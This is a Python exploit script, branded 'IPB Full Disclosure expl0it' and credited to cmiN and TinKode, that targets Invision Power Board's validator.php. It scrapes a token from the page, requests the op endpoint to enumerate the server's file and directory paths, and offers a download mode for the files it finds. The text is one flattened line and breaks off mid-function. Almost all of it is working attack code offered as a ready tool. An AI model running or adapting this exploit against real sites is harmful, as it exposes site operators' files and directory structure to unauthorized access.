#! /usr/bin/env python3.1 ################################################################ # _____ _____ ____ (validator.php) # # |_ _| __ \| _ \ # # | | | |__) | |_) | # # | | | ___/| _ < # # _| |_| | | |_) | # # |_____|_| |____/ # # @expl0it... # ################################################################ # [ IPB Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] # # [ Greetz: insecurity.ro, darkc0de.com ] # ################################################################ # # # Special thanks for: cmiN # # www.TinKode.BayWords.com # ################################################################ import os, sys, urllib.request, urllib.parse, threading def main(): logo = """ \t |---------------------------------------------------------------| \t | _____ _____ ____ (TM) | \t | |_ _| __ \| _ \ | \t | | | | |__) | |_) | | \t | | | | ___/| _ < | \t | _| |_| | | |_) | | \t | |_____|_| |____/ | \t | | \t | | \t | IPB Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by TinKode | \t | | \t | | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: ipbfd.py scan http://www.site.com/IPB_folder | | ipbfd.py download *.zip -> all | | ipbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(args) == 3: try: print("Please wait...") if args[1] == "scan": extract_parse_save(args[2].strip("/")) elif args[1] == "download": download_data(args[2]) except Exception as message: print("An error occurred: {}".format(message)) except: print("Unknown error.") else: print("Ready!") else: print(usage) input() def extract_parse_save(url): print("[+]Extracting content...") hurl = url + "/validator.php" with urllib.request.urlopen(hurl) as usock: source = usock.read().decode() print("[+]Finding token...") word = "validate('" index = source.find(word) if index != -1: source = source[index + len(word):] value = source[:source.index("'")] hurl = url + "/validator.php?op={}".format(value) else: print("[!]Token not found.") print("[+]Obtaining paths...") with urllib.request.urlopen(hurl) as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = line.decode() index = line.find("